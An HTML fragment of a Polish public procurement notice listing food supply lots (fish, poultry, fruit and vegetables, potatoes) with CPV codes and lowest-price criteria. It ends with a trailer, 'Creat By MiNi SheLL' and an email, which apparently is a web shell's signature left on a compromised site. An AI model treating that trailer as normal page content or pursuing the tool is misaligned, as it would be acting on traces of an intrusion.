<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET VII - RYBY I MROŻONKI - 5 pozycji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET VIII - DRÓB..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET VIII - DRÓB - 1 pozycja..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> PAKIET IX - ŚWIEŻE OWOCE I WARZYWA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET IX - ŚWIEŻE OWOCE I WARZYWA - 10 pozycji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.12.30-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> PAKIET X - ZIEMNIAKI..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET X - ZIEMNIAKI - 1 pozycja..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com